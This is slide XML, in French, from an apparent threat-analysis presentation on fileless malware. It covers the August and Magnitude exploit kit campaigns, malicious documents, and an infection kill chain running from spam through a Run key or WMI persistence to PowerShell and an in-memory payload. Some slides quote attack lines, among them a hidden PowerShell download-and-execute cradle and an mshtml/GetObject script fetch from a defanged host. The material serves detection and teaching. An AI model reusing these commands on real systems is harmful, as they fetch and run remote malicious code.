        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3710303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smtClean="0">
                <a:sym typeface="Bodoni SvtyTwo ITC TT-Book"/>
              </a:rPr>
              <a:t>AUGUST</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3872928919"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5345723" y="522514"/>
          <a:ext cx="6175375" cy="5216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647173" y="1106410"/>
            <a:ext cx="1236429" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RegEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> :</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 1"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5345723" y="3563668"/>
            <a:ext cx="64518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-w </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>hidden</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nop</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ep</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> bypass (New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>System.Net.WebClient</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DownloadFile</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="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('http://[URL].</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>asp</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>') | </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>iex</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9163410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smtClean="0">
                <a:sym typeface="Bodoni SvtyTwo ITC TT-Book"/>
              </a:rPr>
              <a:t>MAGNITUDE EK</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3872928919"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5345723" y="522514"/>
          <a:ext cx="6175375" cy="5216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647173" y="1106410"/>
            <a:ext cx="1236429" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RegEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> :</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 1"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5345723" y="3358128"/>
            <a:ext cx="624671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smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>javascript</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mshtml,RunHTMLApplication</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> ";</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>document.write</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GetObject</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="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script:http</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>://dx30z30a4t11l7be .</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>lieslow</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>[.]</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>faith</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF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FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>5aad4b91a0da20d4faab0991bdbe7138') </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1071535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MALDOC</a:t>
            </a:r>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623" y="4009124"/>
            <a:ext cx="1319797" cy="13197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513" y="4015879"/>
            <a:ext cx="1287801" cy="128780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1729" y="2678611"/>
            <a:ext cx="1337268" cy="133726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5430" y="1961712"/>
            <a:ext cx="1285884" cy="128588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0390" y="1931566"/>
            <a:ext cx="1316030" cy="1316030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2351314" y="2461846"/>
            <a:ext cx="2815309" cy="216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ight Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2351313" y="4669022"/>
            <a:ext cx="2815309" cy="216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ight Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1123787">
            <a:off x="6434272" y="2796654"/>
            <a:ext cx="2436839" cy="214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ight Arrow 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20132883">
            <a:off x="6425267" y="4136233"/>
            <a:ext cx="2436839" cy="232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540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6EF-906B-6B42-9DE3-1ACC6B1176DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="412750" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" kern="0" spc="340" dirty="0" smtClean="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
                <a:sym typeface="Bodoni SvtyTwo ITC TT-Book"/>
              </a:rPr>
              <a:t>DEMO TIME</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" kern="0" spc="340" dirty="0">
              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              <a:sym typeface="Bodoni SvtyTwo ITC TT-Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2071440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KILL CHAIN</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rounded Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2343150" y="1771650"/>
            <a:ext cx="1858201"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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2343150" y="1771650"/>
            <a:ext cx="1858201" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EK sur site infecté</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rounded Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2343150" y="2470320"/>
            <a:ext cx="929100"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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2343150" y="2470320"/>
            <a:ext cx="684803" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spam</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rounded Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5645414" y="1771650"/>
            <a:ext cx="1752600"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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5772150" y="1771650"/>
            <a:ext cx="1499128" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spear</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>phishing</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rounded Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2076450" y="1638300"/>
            <a:ext cx="6076950" cy="1485900"/>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ounded Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5645414" y="2470320"/>
            <a:ext cx="1625864"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extBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5645414" y="2470320"/>
            <a:ext cx="1524776" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>URL malicieux</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rounded Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4750933" y="3378924"/>
            <a:ext cx="676788" cy="36933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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4762234" y="3385661"/>
            <a:ext cx="676788" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Créer</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2343150" y="3926186"/>
            <a:ext cx="1722331" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Clef registre </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Run</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6389287" y="3926186"/>
            <a:ext cx="1561704" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6389287" y="3926186"/>
            <a:ext cx="1308371" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Objet WMI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>VBS/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>JScript</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4563974" y="4946820"/>
            <a:ext cx="1173335" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>PowerShell</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rounded Rectangle 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4563974" y="6000750"/>
            <a:ext cx="875048"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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4563974" y="6000750"/>
            <a:ext cx="875048" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Payload</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Rounded Rectangle 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6521714" y="5723751"/>
            <a:ext cx="2165978" cy="78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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6614669" y="5723751"/>
            <a:ext cx="2165978" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exécution du code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Malicieux en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>memoire</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="Straight Arrow Connector 33"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5001498" y="3089663"/>
            <a:ext cx="46753" cy="27480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19" idx="3"/>
            <a:endCxn id="23" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5439022" y="3570327"/>
            <a:ext cx="1604451" cy="35585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9" idx="1"/>
            <a:endCxn id="21" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="3204316" y="3570326"/>
            <a:ext cx="1557918" cy="35585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1" idx="2"/>
            <a:endCxn id="25" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="3604661" y="4172172"/>
            <a:ext cx="558969" cy="135965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3" idx="2"/>
            <a:endCxn id="25" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6110907" y="4198919"/>
            <a:ext cx="558969" cy="130616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5" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5150641" y="5316152"/>
            <a:ext cx="1" cy="684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2076450" y="3244333"/>
            <a:ext cx="6076950" cy="2160033"/>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6" name="Straight Arrow Connector 45"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="27" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5439022" y="6185416"/>
            <a:ext cx="11756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ight Brace 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8647923" y="1638300"/>
            <a:ext cx="366641" cy="145136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Right Brace 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8647923" y="3244333"/>
            <a:ext cx="366642" cy="21600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Right Brace 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8740067" y="5559036"/>
            <a:ext cx="274496" cy="9457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TextBox 60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9543354" y="2196584"/>
            <a:ext cx="1901546" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
